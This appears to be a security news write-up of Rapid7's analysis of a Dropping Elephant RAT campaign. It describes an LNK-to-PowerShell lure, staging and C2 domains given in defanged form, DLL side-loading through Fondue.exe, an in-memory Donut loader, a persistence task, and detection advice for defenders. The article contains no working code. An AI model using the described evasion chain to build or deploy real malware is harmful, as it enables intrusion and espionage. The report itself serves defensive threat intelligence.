The threat actor known as Dropping Elephant has re-emerged with a significantly upgraded malware operation, leveraging a China-themed lure document and a sophisticated remote access trojan (RAT) designed to evade modern security controls.
Researchers at Rapid7 uncovered the latest Dropping Elephant RAT campaign during a proactive threat-hunting engagement and found that while the group’s core tradecraft remains recognizable, the underlying malware framework has undergone substantial refinement.
The campaign combines malicious shortcut files, PowerShell-based delivery, DLL side-loading, in-memory payload execution, and advanced anti-analysis techniques to provide attackers with persistent access while minimizing forensic visibility.
Key Details
The attack begins with a malicious Windows shortcut file named GRES3001.lnk, disguised as a PDF document associated with an industrial energy contract.
When opened, the shortcut silently executes an embedded PowerShell downloader while presenting the victim with a legitimate-looking decoy document related to a GRES-3 seawater pump contract.
Behind the scenes, the PowerShell script contacts a staging server hosted at chinagreenenergy[.]org, where additional malware components are retrieved.
Rapid7 researchers were able to obtain the entire malware toolkit because the staging infrastructure remained active during their investigation.
Their analysis identified multiple indicators linking the operation directly to previous Dropping Elephant campaigns, including:
- Similar delivery mechanisms
- Consistent screenshot collection behavior
- Familiar command-and-control communication patterns
- Reused command-handler architecture
- Comparable beaconing logic
The findings suggest the group has evolved its malware capabilities without abandoning its established operational methodology.
Technical Analysis
One of the most notable aspects of the campaign is its sophisticated multi-stage execution chain.
After the initial PowerShell downloader runs, several files are staged within the C:\Users\Public directory.
Among them is a legitimate Microsoft executable named Fondue.exe, which is abused to perform DLL side-loading.
The attack chain unfolds as follows:
Stage 1: DLL Side-Loading
Fondue.exe loads a malicious DLL disguised as APPWIZ.cpl.
Because the executable is signed and trusted, this technique helps the attackers bypass certain security controls and blend into normal system activity.
Stage 2: Payload Decryption
The malicious DLL decrypts an encrypted file named editor.dat and passes the resulting payload to a Donut shellcode loader.
Stage 3: In-Memory Execution
The Donut loader maps the final RAT directly into memory.
Unlike conventional malware that writes executable files to disk, this approach leaves a significantly smaller forensic footprint and reduces the likelihood of detection by traditional antivirus solutions.
Once active, the malware performs extensive host reconnaissance before establishing encrypted communications with its command-and-control (C2) infrastructure hosted at gcl-power[.]org over HTTPS on port 443.
The RAT beacons to its operators every 10 seconds and supports:
- Remote command execution
- File uploads
- File downloads
- Directory enumeration
- Screenshot capture
- Host reconnaissance
Together, these capabilities provide attackers with complete operational control over infected systems.
Impact and Risks
The campaign presents significant risks for organizations across both public and private sectors.
Because the RAT operates entirely in memory and employs multiple layers of evasion, infected systems may remain compromised for extended periods without triggering traditional endpoint alerts.
Potential impacts include:
- Long-term unauthorized access
- Sensitive data theft
- Credential harvesting
- Internal reconnaissance
- Lateral movement
- Deployment of additional malware
- Espionage operations
- Follow-on ransomware activity
The malware’s ability to collect screenshots and execute arbitrary commands provides operators with real-time visibility into victim environments, increasing the risk of targeted data exfiltration and operational disruption.
Organizations that rely heavily on signature-based detection methods may struggle to identify infections before substantial damage occurs.
Expert Recommendations
Rapid7 advises defenders to focus on behavioral detection rather than relying solely on indicators of compromise (IOCs).
Because filenames, hashes, and infrastructure can change rapidly between campaigns, defenders should prioritize identifying suspicious activity patterns.
Monitor Shortcut-to-PowerShell Execution
Investigate instances where:
- LNK files spawn PowerShell
- PowerShell downloads content from external domains
- Hidden PowerShell execution occurs
Hunt for Public Directory Staging
Monitor for suspicious files being written to:
C:\Users\Public\Particularly when executable content, DLLs, or encrypted payloads appear unexpectedly.
Detect Suspicious Scheduled Tasks
A key detection opportunity involves the scheduled task:
GoogleErrorReport
Security teams should immediately investigate systems where this task launches executables from non-standard Windows directories.
Strengthen Endpoint Detection
Organizations should ensure their endpoint detection and response (EDR) platforms can identify:
- Memory-resident malware
- DLL side-loading activity
- AMSI bypass attempts
- ETW tampering
- PowerShell abuse
- Process injection techniques
Review Logging and Telemetry
Enable detailed logging for:
- PowerShell execution
- Scheduled task creation
- Process creation events
- DLL loading activity
- Outbound HTTPS connections
Implement Network Monitoring
Monitor for beaconing patterns and unusual outbound communications to newly registered or suspicious infrastructure.
Industry Context
The campaign reflects a broader trend toward stealth-focused malware frameworks that prioritize memory-only execution and defense evasion.
Threat actors increasingly rely on techniques such as:
- In-memory payload delivery
- DLL side-loading
- Living-off-the-land binaries (LOLBins)
- AMSI bypasses
- ETW suppression
- Encrypted command-and-control traffic
These methods are designed to undermine traditional security tooling and complicate both automated detection and manual incident response.
The use of Donut shellcode loaders, runtime API resolution, and control-flow flattening further demonstrates how modern threat actors are investing in anti-analysis capabilities traditionally associated with advanced persistent threat (APT) operations.
As endpoint protection technologies improve, attackers continue shifting toward behavioral evasion rather than relying solely on malware obfuscation.
Conclusion
Rapid7’s discovery of the latest Dropping Elephant operation highlights how established threat actors continue evolving their toolsets to stay ahead of defenders. By combining malicious shortcut files, PowerShell delivery, DLL side-loading, in-memory RAT execution, and extensive anti-analysis protections, the group has built a malware framework capable of maintaining persistent and stealthy access to victim environments.
For defenders, the campaign serves as a reminder that behavioral monitoring, threat hunting, and memory-focused detection capabilities are increasingly essential as attackers move beyond traditional file-based malware techniques.
FAQ SECTION
Who is Dropping Elephant?
Dropping Elephant is a long-tracked cyber threat actor known for conducting targeted malware campaigns that often use social engineering lures, remote access trojans, and stealth-focused persistence techniques.
What is the primary malware used in this campaign?
The campaign deploys a custom remote access trojan (RAT) that executes entirely in memory and provides attackers with full remote control of compromised systems.
Why is in-memory malware dangerous?
In-memory malware avoids writing its final payload to disk, making it more difficult for traditional antivirus and file-scanning tools to detect.
What is the GoogleErrorReport scheduled task?
GoogleErrorReport is a malicious persistence mechanism created by the malware. It launches the compromised execution chain every minute to maintain access after system reboots or interruptions.
How can organizations detect this campaign?
Defenders should monitor for PowerShell launched by shortcut files, suspicious scheduled tasks, DLL side-loading behavior, AMSI tampering, ETW patching, and files staged in the C:\Users\Public directory.
